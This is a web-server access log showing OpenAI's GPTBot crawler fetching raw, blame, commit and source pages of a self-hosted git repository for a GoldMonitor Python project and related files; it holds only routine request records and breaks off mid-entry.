"/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12627] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12269] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10999] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 17999] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22263] [Gzip 11.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11577] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10233] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm" +[17/Feb/2026:14:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 11795] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11406] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10262] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12359] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12626] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10999] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22184] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12369] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12239] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11487] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 19888] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9864] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11520] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11376] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20871] [Gzip 10.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 